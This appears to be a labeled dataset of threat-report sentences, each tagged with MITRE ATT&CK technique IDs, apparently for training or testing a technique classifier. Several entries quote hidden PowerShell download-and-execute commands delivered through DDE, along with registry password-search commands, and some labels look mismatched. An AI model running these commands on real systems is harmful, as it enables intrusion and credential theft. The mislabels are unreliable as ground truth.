{"text1":"Next, the script triggered a PowerShell stager","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Following successful infiltration, the malware persists through registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run The command line execution leads to PowerShell code executed from a different registry value.","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs.","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The script is used to decode and execute the following payloads: Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample. Appach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample. PoohMilk Analysis The PoohMilk sample is designed to perform two actions: Create persistence to execute the Freenki sample at the next reboot. Check specific files on the infected machine. The first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file previously downloaded","labels":"['T1106']"}
|
|
{"text1":"Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to use similar Windows APIs","labels":"['T1055.012']"}
|
|
{"text1":"It hands over the decrypted buffer extracted from the resource section and the path from the original RegAsm executable to the start_protect_hexcode function.Then it starts the process-hollowing shellcode, which is stored in the HEXCODE1 variable","labels":"['T1055.012']"}
|
|
{"text1":"Then, they are using the process hollowing technique to hide the execution of these tools inside of the original Microsoft vbc.exe (VisualBasic Compiler) process","labels":"['T1055.012']"}
|
|
{"text1":"Figure 6 Example of delivery document The RTF document (8cf3bc2bf\u2026) was very small in size at 264 bytes, which can be seen in its entirety here: {\\rtf1{\\field{\\*\\fldinst DDEAUTO \"C:\\\\\\\\WIndowS\\\\\\\\SYsTem32\\\\\\\\cMD.eXe \" \"\/C\tPOWErsHELl.eXE\u00a0\u00a0-ex\u00a0\u00a0\u00a0\u00a0 BypaSs\u00a0\u00a0-NOP\t-w\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0HIdDen\u00a0\u00a0(NEw-oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe( 'hxxp:\/\/86.106.131[.]177\/link\/GRAPH.EXE'\u00a0\u00a0,\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 '%apPDAtA%\\graph.exe'\u00a0\u00a0 )\u00a0\u00a0 ;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 saps\u00a0\u00a0\u00a0\u00a0'%Appdata%\\graph.exe'\"}}} The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server, save it as an executable file on the system and then execute the payload","labels":"['T1055.012']"}
|
|
{"text1":"Figure 1 Article referenced by decoy document in attack against British government agency The attached document leverages a DDE exploit to ultimately execute the following code: c:\\\\windows\\\\system32\\\\cmd.exe \"\/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https:\/\/881.000webhostapp[.]com\/0_31.doc', '%TEMP%\\\\AAA.exe');Start-Process('%TEMP%\\\\AAA.exe') Palo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it","labels":"['T1055.012']"}
|
|
{"text1":"Upon execution, this Trojan checks to see if it was configured with \u201cBINDERON\u201d to determine if it should extract an embedded payload from a resource named \u201cB\u201d, save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload","labels":"['T1055.012']"}
|
|
{"text1":"Figure 15: Structure used to send data to server Figure 16: Structure used to send data to C2 server The structure is converted to Base64 using the CryptBinaryToStringA function","labels":"['T1048']"}
|
|
{"text1":"It then uses WebDAV to upload to a Box cloud drive.","labels":"['T1048']"}
|
|
{"text1":"Much like the previous version of Reaver, Reaver.v3 will query the necessary registry keys to determine the correct startup path to use","labels":"['T1012']"}
|
|
{"text1":"An example of this decompressed configuration may be seen below: Figure 2 Decompressed Reaver configuration This configuration contains multiple pieces of information, including the following: Network port Sleep timer between network requests Remote Command and Control (C2) Service Name Service Description Service Display Name Hardcoded String","labels":"['T1569.002']"}
|
|
{"text1":"Much like the original payload, this tool uses if\/else statements to skip the legitimate code in the Saransh Email System source to run the malicious functions, which have the same method names as the original tool and follow the same call sequence: Form1.Speed Form1.diomadnfagaghagh Form1.fjcsERIfjfiojsGHIsdifjksi Form1.gsgjIDJIGJIGJIGJIFDOSpl Form1.FJaioefgkaoeK This chain of functions eventually loads a resource named \u2018GSrdofjksrgj\u2019, which the tool decrypts using the same algorithm and key as in the initial payload:byte[] array4 = new byte[] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 };The decrypted payload has a SHA256 hash of 5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote administration tool","labels":"['T1569.002']"}
|
|
{"text1":"The files we recovered indicate they do it by executing a script file, which uses the Sysinternals psexec tool to move laterally by trying to copy it to every machine they can reach:","labels":"['T1569.002']"}
|
|
{"text1":"The following capabilities have been observed in this payload: Get drive information Modify files Modify directories Modify registry Spawn process Terminate process Modify services Kill self Ties to SunOrcal Reaver was used concurrently with SunOrcal over the past year, to include two Reaver samples dropped from zip files hosted on a domain also being used as a SunOrcal C2 (www.fyoutside[.]com), and there is also passive DNS overlap amongst the C2s","labels":"['T1112']"}
|
|
{"text1":"The backdoor will modify the registry for the Windows Media Player to store its C&C configuration.","labels":"['T1112']"}
|
|
{"text1":"Hard Disk Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_DiskDrive \u00a0 The Trojan will check the Caption and Model fields in the results for the strings Virtual, VMWare, VM, VBox or Oracle","labels":"['T1497.001', 'T1497']"}
|
|
{"text1":"Motherboard Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_BaseBoard \u00a0 The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle","labels":"['T1497.001', 'T1497']"}
|
|
{"text1":"ShellTea utilizes a number of techniques to identify if it is running within a virtual environment or is being monitored.","labels":"['T1497.001', 'T1497']"}
|
|
{"text1":"High resolution screenshots of specified process windows and when recording VoiceIP application audio","labels":"['T1123']"}
|
|
{"text1":"To ensure its victim will use IE, it will terminate any process in-focus that is Chrome or Firefox, in hopes the victim will believe the browsers are \u201cmalfunctioning.\u201d Whenever a victim uses IE and browses to specific Brazilian banks or businesses, the malware will only then begin to log keystrokes","labels":"['T1552.001']"}
|
|
{"text1":"The usage of LinkedIn to deliver malicious documents,","labels":"['T1566.003']"}
|
|
{"text1":"At the same time, Enc.exe will start the encryption routine and append \u201c. jcry \u201d as file extension to the encrypted file.","labels":"['T1486']"}
|
|
{"text1":"Opening document starts a template injection technique for loading the document template from the internet.","labels":"['T1221']"}
|
|
{"text1":"The Data field is encrypted using a custom stream cipher.","labels":"['T1486']"}
|
|
{"text1":"Finally the script deletes the shadow copies, in a preparation for the ransomware operations.","labels":"['T1490']"}
|
|
{"text1":"They apparently create a Domain Admin account named SQLSVC and give it the password Br4pbr4p (which also happens to be the password salt preconfigured in the dirtycow exploit script) and then leverage that account to perform a series of commands.","labels":"['T1136']"}
|
|
{"text1":"smb and exploit in same sentence","labels":"['T1210']"}
|
|
{"text1":"The decoy file, doc.rtf, contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP%","labels":"['T1559.002']"}
|
|
{"text1":"The decrypted shellcode is dropped as a Microsoft Word plugin WLL into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP.","labels":"['T1137']"}
|
|
{"text1":"The wormDll32 module attempts to identify servers and domain controllers in the network using NetServerEnum and LDAP queries.","labels":"['T1482']"}
|
|
{"text1":"This module searches the infected system\u2019s files to gather email addresses for information-stealing purposes.","labels":"['T1114']"}
|
|
{"text1":"A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file.","labels":"['T1025']"}
|
|
{"text1":"overwrite or delete MBR in same sentence","labels":"['T1561.002']"}
|
|
{"text1":"master boot record wiper","labels":"['T1561.002']"}
|
|
{"text1":"MBR + overwrite\/wipe","labels":"['T1561.002']"}
|
|
{"text1":"reg query HKLM \/f password \/t REG_SZ \/s","labels":"['T1552.002']"}
|
|
{"text1":"reg query HKCU \/f password \/t REG_SZ \/s","labels":"['T1552.002']"}
|
|
{"text1":"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager","labels":"['T1546.009']"}
|
|
{"text1":"COM and execution in same sentence","labels":"['T1021.003']"}
|
|
{"text1":"C:\\Windows\\System32\\sethc.exe","labels":"['T1546.008']"}
|
|
{"text1":"collect + keychain in same sentence","labels":"['T1555.001']"}
|
|
{"text1":"looks for net and account or domain in close proximity","labels":"['T1201']"}
|
|
{"text1":"!ProcessList List running processes, including their PID, parent PID, executable name and priority !SendFileToServer Uploads a specified file to the C2 server !CaptureScreen Takes a screenshot that it saves to a file and uploads to the C2 server","labels":"['T1057', 'T1105']"}
|
|
{"text1":"(Source: Dell SecureWorks) Appendix C \u2014 OwaAuth web shell analysis OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell","labels":"['T1059', 'T1505.003']"}
|
|
{"text1":"(Source: Dell SecureWorks) ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system","labels":"['T1059', 'T1505.003']"}
|
|
{"text1":"(Source: Dell SecureWorks) Table 4 lists the OwaAuth web shell commands available to the adversary","labels":"['T1059', 'T1505.003']"}
|
|
{"text1":"(Source: Dell SecureWorks) The following tools appear to be exclusive to TG-3390: OwaAuth web shell \u2014 A web shell and credential stealer deployed to Microsoft Exchange servers","labels":"['T1059', 'T1505.003']"}
|
|
{"text1":"(Source: SecureWorks) NetWire logs keystrokes and peripheral inputs into encoded files in the C:\\Users\\<username> Figure 3","labels":"['T1033', 'T1056']"}
|
|
{"text1":"(Source: SecureWorks) The \u201cWindows Folder.exe\u201d executable spawns and injects code into the legitimate notepad.exe Windows process (see Figure 2)","labels":"['T1055.012', 'T1055']"}
|
|
{"text1":"0x007CFABF video Desktop video recording 0x06E533C4 download Downloads executable and injects into new process 0x00684509 ammyy Ammyy Admin tool 0x07C6A8A5 update Updates self 0x0B22A5A7 \u00a0 Add\/Update klgconfig (analysis incomplete) 0x0B77F949 httpproxy Starts HTTP proxy 0x07203363 killos Renders computer unbootable by wiping the MBR 0x078B9664 reboot Reboots the operating system 0x07BC54BC tunnel Creates a network tunnel 0x07B40571 adminka Adds new C2 server or proxy address for pseudo-HTTP protocol 0x079C9CC2 server Adds new C2 server for custom binary protocol 0x0007C9C2 user Creates or deletes Windows user account 0x000078B0 rdp Enables concurrent RDP (analysis incomplete) 0x079BAC85 secure Adds Notification Package (analysis incomplete) 0x00006ABC del Deletes file or service 0x0A89AF94 startcmd Adds command to the configuration file (see the Configuration section) 0x079C53BD runmem Downloads executable and injects directly into new process 0x0F4C3903 logonpasswords Send Windows accounts details to the C2 server 0x0BC205E4 screenshot Takes a screenshot of the desktop and sends it to the C2 server 0x007A2BC0 sleep Backdoor sleeps until specified date 0x0006BC6C dupl Unknown 0x04ACAFC3 \u00a0 Upload files to the C2 server 0x00007D43 vnc Runs VNC plugin 0x09C4D055 runfile Runs specified executable file 0x02032914 killbot Uninstalls backdoor 0x08069613 listprocess Returns list of running processes to the C2 server 0x073BE023 plugins Change C2 protocol used by plugins 0x0B0603B4 \u00a0 Download and execute shellcode from specified address 0x0B079F93 killprocess Terminates the first process found specified by name 0x00006A34 cmd Initiates a reverse shell to the C2 server 0x09C573C7 runplug Plugin control 0x08CB69DE autorun Updates backdoor Table 2: Supported Commands Configuration A configuration file resides in a file under the backdoor\u2019s installation directory with the .bin extension","labels":"['T1041', 'T1105', 'T1008']"}
|
|
{"text1":"13 14 ams_api64.dll ams_api32.dll Handy wrapper around API of exXX.dll, pdXX.dll, sgXX.dll","labels":"['T1055', 'T1574.001', 'T1574.002']"}
|
|
{"text1":"2.\u00a0\u00a0\u00a0\u00a0 The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3.\u00a0\u00a0\u00a0\u00a0 The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe\u00a0:\u00a0GUP, a free (LGPL) Generic Updater.\u00a0GUP is an open source binary used by Notepad++ for software updates","labels":"['T1055.012', 'T1106', 'T1036', 'T1010']"}
|
|
{"text1":"22 Keylogging and exfiltrating data The exfiltrated data is base64 that decodes into more custom encoded strings that appear to be \u201c\/\u201d delimited","labels":"['T1140', 'T1560']"}
|
|
{"text1":"37 38 zlib64.dll zlib32.dll Open source \u201czlib\u201d version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll)","labels":"['T1055', 'T1574.002']"}
|
|
{"text1":"59 60 61 62 freeimage_32.dll freeimageplus_32.dll freeimage_64.dll freeimageplus_64.dll FreeImage open source library supports popular graphics image formats (ver 3.15.4 2012-10-27) (http:\/\/freeimage.sourceforge.net)","labels":"['T1055', 'T1574.001']"}
|
|
{"text1":"68271df868f462c06e24a896a9494225,Office Monkeys LOL Video.zip Believe it or not, recipients in bulk run the file within: 95b3ec0a4e539efaa1faa3d4e25d51de,Office Monkeys (Short Flash Movie).exe This file in turn drops two executables to %temp%: 2aabd78ef11926d7b562fd0d91e68ad3, Monkeys.exe 3d3363598f87c78826c859077606e514, player.exe It first launches Monkeys.exe, playing a self-contained, very funny video of white-collar tie wearing chimpanzees working in a high rise office with a human colleague","labels":"['T1036', 'T1125']"}
|
|
{"text1":"Additional Features The Zyklon malware offers the following additional capabilities (via plugins): Browser Password Recovery Zyklon HTTP can recover passwords from popular web browsers, including: Google Chrome Mozilla Firefox Internet Explorer Opera Browser Chrome Canary\/SXS CoolNovo Browser Apple Safari Flock Browser SeaMonkey Browser SRWare Iron Browser Comodo Dragon Browser FTP Password Recovery Zyklon currently supports FTP password recovery from the following FTP applications: FileZilla SmartFTP FlashFXP FTPCommander Dreamweaver WS_FTP Gaming Software Key Recovery Zyklon can recover PC Gaming software keys from the following games: Battlefield Call of Duty FIFA NFS Age of Empires Quake The Sims Half-Life IGI Star Wars Email Password Recovery Zyklon may also collect email passwords from following applications: Microsoft Outlook Express Microsoft Outlook 2002\/XP\/2003\/2007\/2010\/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail, Foxmail v6.x - v7.x Windows Live Messenger MSN Messenger Google Talk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger Windows Credential Manager License Key Recovery The malware automatically detects and decrypts the license\/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero","labels":"['T1003', 'T1552.001']"}
|
|
{"text1":"Additional mitigations that could help to prevent attacks like these from succeeding in your environment include: Changing the default handler for \u201c.hta\u201d files in your environment so that they cannot be directly executed","labels":"['T1070.004', 'T1105']"}
|
|
{"text1":"After decrypting and decompressing the strings, we can trivially identify aspects of the PlugX configuration","labels":"['T1140', 'T1027']"}
|
|
{"text1":"Afterwards, the persistence file will be created in \/Library\/LaunchDaemons\/ or ~\/Library\/LaunchAgents\/ \u00a0folder","labels":"['T1564.001', 'T1543.001']"}
|
|
{"text1":"After we decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework, specifically using the block_api.asm code to resolve API function names and the block_reverse_http.asm code to obtain additional shellcode to execute on the system","labels":"['T1140', 'T1105']"}
|
|
{"text1":"All of the backdoors identified - excluding RoyalDNS - required APT15 to create batch scripts in order to install its persistence mechanism","labels":"['T1064', 'T1547.001']"}
|
|
{"text1":"All of these files reside in the victim\u2019s %TEMP% directory: Filename Description 9PT568.dat Contains victim unique identifier TPX498.dat Keystroke logs edg499.dat List of interesting files TPX499.dat Temporarily holds screenshot when given command by C2 up Temporarily contains downloaded file to be executed when given command by C2 \u00a0 Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers","labels":"['T1036', 'T1041']"}
|
|
{"text1":"Amongst the downloaded files, \u00a0the fake .gif and .jpg files appear to be dependencies for the malware","labels":"['T1083', 'T1105']"}
|
|
{"text1":"A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes","labels":"['T1070.004', 'T1064', 'T1027']"}
|
|
{"text1":"Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server: C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server: Directory listing of the user\u2019s Desktop folder using command: cmd.exe \/c dir C:\\DOCUME~1\\<username>\\Desktop\\ >> C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Directory listing of the user\u2019s recently accessed files using command: cmd.exe \/c dir C:\\DOCUME~1\\<username>\\Recent >> C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Directory listing of the system\u2019s %programfiles% folder using command: cmd.exe \/c dir C:\\PROGRA~1\\ >> C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Systeminfo of the endpoint using command: cmd.exe \/c systeminfo >> C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Copies the file ixe000.bin from: C:\\Documents and Settings\\<username>\\Application Data\\Microsoft\\Windows\\UserProfiles\\ixe000.bin To: C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Registry key and value information for the current user\u2019s Run key (with information collected): HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Number of subkeys (<KeyIndex>) <KeyName> Number of Values under each key including the parent Run key (<ValueIndex>) <Value_Name> <Value_Content> Registry Run key enumeration by Gold Dragon","labels":"['T1033', 'T1547.001', 'T1486']"}
|
|
{"text1":"Apart from its backdoor routines, this malware can steal information through keylogging, audio recording, and screen capture","labels":"['T1113', 'T1123']"}
|
|
{"text1":"A shortcut file is generated in the following path: %TEMP%\\~Update.lnk This \u2018~Update.lnk\u2019 file is then copied to a filename of \u2018Windows help.lnk\u2019, which is placed in the startup path previously identified","labels":"['T1036', 'T1547.009']"}
|
|
{"text1":"As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name","labels":"['T1082', 'T1083']"}
|
|
{"text1":"Assuming the victim opens the attachment, the infection process begins as described in the following section. Many of the distribution servers that are being used to host the HawkEye keylogger binaries that are retrieved during the infection process are hosting large numbers of malicious binaries and, in many cases, contain open directory listings that can be used to identify the scope of the infections that they are being used to facilitate","labels":"['T1057', 'T1056']"}
|
|
{"text1":"A string with the 5-character length and encoded with BASE64 is added to the beginning of the buffer encoded using the BASE64 algorithm","labels":"['T1027', 'T1132']"}
|
|
{"text1":"Attack Flow and Exfiltration After injecting into the targeted processes, the modules continue their malicious activity through those processes","labels":"['T1055', 'T1057']"}
|
|
{"text1":"AutoFocus customers may learn more from the DarkHydrus tag IOC Related SHA256 Hashes Payloads cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1 ac7f9c536153780ccbec949f23b86f3d16e3105a5f14bb667df752aa815b0dc4 a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88 d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda dd2625388bb2d2b02b6c10d4ee78f68a918b25ddd712a0862bcf92fa64284ffa b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81 c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3 ce84b3c7986e6a48ca3171e703e7083e769e9ced1bbdd7edf8f3eab7ce20fd00 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c Delivery documents d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318 8063c3f134f4413b793dfc05f035b6480aa1636996e8ac4b94646292a5f87fde 9eac37a5c675cd1750cd50b01fc05085ce0092a19ba97026292a60b11b45bf49 cf9b2b40ac621aaf3241ff570bd7a238f6402102c29e4fbba3c5ce0cb8bc25f9 0a3d5b2a8ed60e0d96d5f0d9d6e00cd6ab882863afbb951f10c395a3d991fbc1 0b1d5e17443f0896c959d22fa15dadcae5ab083a35b3ff6cb48c7f967649ec82 870c8b29be2b596cc2e33045ec48c80251e668abd736cef9c5449df16cf2d3b8 ff0b59f23630f4a854448b82f1f0cd66bc4b1124a3f49f0aecaca28309673cb0 01fd7992aa71f4dca3a3766c438fbabe9aea78ca5812ab75b5371b48bd2625e2 6dcb3492a45a08127f9816a1b9e195de2bb7e0731c4e7168392d0e8068adae7a 47b8ad55b66cdcd78d972d6df5338b2e32c91af0a666531baf1621d2786e7870 776c056096f0e73898723c0807269bc299ae3bbd8e9542f0a1cbba0fd3470cb4 cf7863e023475d695c6f72c471d314b8b1781c6e9087ff4d70118b30205da5f0 e88045931b9d99511ce71cc94f2e3d1159581e5eb26d4e05146749e1620dc678 26e641a9149ff86759c317b57229f59ac48c5968846813cafb3c4e87c774e245 b5cfaac25d87a6e8ebabc918facce491788863f120371c9d00009d78b6a8c350 ad3fd1571277c7ce93dfbd58cee3b3bec84eeaf6bb29a279ecb6a656028f771c Related Domains maccaffe[.]com cisc0[.]net 0utl00k[.]net msdncss[.]com 0ffice[.]com 0ffiice[.]com micrrosoft[.]net anyconnect[.]stream bigip[.]stream fortiweb[.]download 
kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win allexa[.]net kaspersky[.]host hotmai1[.]com 0utlook[.]bid","labels":"['T1087']"}
|
|
{"text1":"Backdoor.Remexi, one of the malware in use by Chafer, had the following \u00a0command and control\u00a0host: 87pqxz159.dockerjsbin[.]com Interestingly, IP address \u00a083.142.230.138, which\u00a0serve as a\u00a0command and control address for an OilRig related sample (3a5fcba80c1fd685c4b5085d9d474118), was pointed to by\u00a087pqxz159.dockerjsbin[.]com as well","labels":"['T1016', 'T1102']"}
|
|
{"text1":"The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary: Mozilla\/5.0 (Windows NT 6.1; WOW64) Chrome\/28.0.1500.95 Safari\/537.36 Control Server Communications. The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data.","labels":"['T1036', 'T1048', 'T1132']"}
|
|
{"text1":"Based on the McAfee Advanced Threat Research team\u2019s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor","labels":"['T1140', 'T1027.001']"}
|
|
{"text1":"By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process","labels":"['T1055', 'T1057']"}
|
|
{"text1":"C2 Command Purpose reboot Reboot the system using shutdown command shutdown Shut down the system using shutdown command clean Wipe the Drives, C:\\, D:\\, E:\\, F:\\ screenshot Take a screenshot of the System upload Encrypt and upload the information from the system excel Leverage Excel.Application COM object for code execution outlook Leverage Outlook.Application COM object for code execution risk Leverage DCOM object for code execution Conclusion This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware","labels":"['T1113', 'T1082', 'T1053.005', 'T1106', 'T1140']"}
|
|
{"text1":"ChromeUpdate.exe starts the file with \u201crundll32 cache.dll,ADB_Setup\u201d Cache.dll analysis Cache.dll was written in C\/C++ and built with a Microsoft compiler","labels":"['T1055', 'T1218.011']"}
|
|
{"text1":"Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more","labels":"['T1115', 'T1070.004', 'T1070']"}
|
|
{"text1":"Command_Keylog_offline:\u00a0 Load into memory a dll that contains the function \u201cPluginMe\u201d.\u00a0 After researching and analyzing additional Gh0stRAT samples while trying to figure out what dll contains \u201cPluginMe\u201d, I found a DLL for keylogging (called Keylog.dll) in a Gh0stRAT 2.0 sample that exported \u201cPluginMe\u201d.\u00a0 Using that and a cross-comparison of another Gh0stRAT sample that I\u2019ve previously analyzed, I was able to determine that \u201cPluginMe\u201d is an offline keyboard manager","labels":"['T1055', 'T1574.001', 'T1218.011', 'T1574.002', 'T1056']"}
|
|
{"text1":"Command_Update_Server:\u00a0 This command passes the string \u201cGh0st Update\u201d to the malware sample before running the sample again.\u00a0 When the sample restarts, it detects the \u201cGh0st Update\u201d command line arg, and connects to the server in order to update the sample.\u00a0 Command_Clean_Event:\u00a0 This command locates and deletes all of the event logs on the system","labels":"['T1070.004', 'T1059', 'T1070', 'T1102']"}
|
|
{"text1":"Command Description 0x31 Fingerprint System via WMI and Registry 0x32 Drop File and execute 0x33 Remote Shell 0x34 Terminate connection with C2 0x35 Download and run batch script 0x36 Download file on machine 0x37 Upload File Table 2: FELIXROOT backdoor commands Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed","labels":"['T1064', 'T1105']"}
|
|
{"text1":"Command Description Action 0 Server response string contains batch commands Execute batch commands and send results back to server 1 Server response string is a file path Check for file path and upload (PUT) the file to server 2 Server response string is a file path Check for file path and download (GET) the file Table 1: POWRUNER commands After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution","labels":"['T1070.006', 'T1041', 'T1105']"}
|
|
{"text1":"Command Functionality Init Create a reverse shell Write Write a file to the compromised system from the C2 server List List the files in a directory Upload Upload a file from the compromised system to the C2 server Table 2","labels":"['T1041', 'T1105']"}
|
|
{"text1":"Command ID Description 0 Uninstall Keydnap and quit 1 Update the backdoor from a base64-encoded file 2 Update the backdoor given a URL 3 Decode and execute a base64-encoded file 4 Decode and execute a base64-encoded Python script 5 Download and execute a file from a URL 6 Download and execute a Python script from a URL 7 Execute a command and report the output back to the C&C server 8 Request administrator privileges the next time the user runs an application 9 Decode and execute, or stop, a base64-encoded file called authd_service The last two commands stand out","labels":"['T1140', 'T1132', 'T1569.002']"}
|
|
{"text1":"Comnie will make requests to these URLs, looking for base64-encoded data after an identifier of \u2018magnet:\/\u2019, as seen in the example below: Figure 14 GitHub storing Comnie C2 information In the example above, the C2 information is being stored within the user\u2019s URL parameter within GitHub","labels":"['T1102', 'T1041']"}
|
|
{"text1":"Continuing Malicious Activity and Manipulating Additional Security Products After the module loads with regsvr32.exe, the Irdsnhrxxxfery64 module injects another module Irdsnhrxxxfery98, which was downloaded by the script into regsvr32.exe using the LoadLibraryExW() function","labels":"['T1055', 'T1218.010']"}
|
|
{"text1":"Create processes Write responses from the control server to a file Send information for all drives Write data sent by the control server to a temporary file matching the file path pattern %temp%\\DWS00* Change the time of a file as specified by the control server The malware changing the file time","labels":"['T1070.006', 'T1074', 'T1041']"}
|
|
{"text1":"cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence","labels":"['T1053.005', 'T1064']"}
|
|
{"text1":"Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity. Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware","labels":"['T1518.001', 'T1018']"}
|
|
{"text1":"Decrypted Config: C&C IP: 192.168.0.107 Port: 80 Sleep Timer: 30000 Campaign Identifier: Mirage If you look at it the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address","labels":"['T1140', 'T1016']"}
|
|
{"text1":"Deletes the registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open Deletes the dropper components from the system","labels":"['T1070.004', 'T1112']"}
|
|
{"text1":"Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red) The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db)","labels":"['T1055', 'T1574.002']"}
|
|
{"text1":"Downloading stylesheets allows for embedded JavaScript and VBS to be run from within them, at which point any type of malware could be staged and run quite easily","labels":"['T1064', 'T1547.001']"}
|
|
{"text1":"During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH","labels":"['T1036', 'T1021']"}
|
|
{"text1":"During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL: http:\/\/ink[dot]inkboom.co.kr\/host\/img\/jpg\/post.php HTTP data\/parameters used in the request include: Content-Type: multipart\/form-data; boundary=\u2014-WebKitFormBoundar ywhpFxMBe19cSjFnG <followed by base64 encoded & encrypted system info> User Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; .NET CLR 1.1.4322) Accept-Language: en-us HTTP Version: HTTP\/1.0 The malware can also download and execute additional components served to it by the control server","labels":"['T1071', 'T1048', 'T1132', 'T1486']"}
|
|
{"text1":"During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East","labels":"['T1068', 'T1203']"}
|
|
{"text1":"Embed \"scriptlets\" in generated payloads to perform some tasks \"offline\" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm, etc.) Multiple Target Platforms: Platform Support Status Windows XP Supported Windows 7 Supported Windows 8 Supported Windows 10 Supported Linux Supported Mac OSX Limited Support Android Limited Support Documentation All documentation can be found on the wiki","labels":"['T1106', 'T1010']"}
|
|
{"text1":"Encoding the encryption key In order for the C&C server to decrypt the encrypted data, the randomly generated AES256 key must be included in the packet along with the encrypted data","labels":"['T1573', 'T1486']"}
|
|
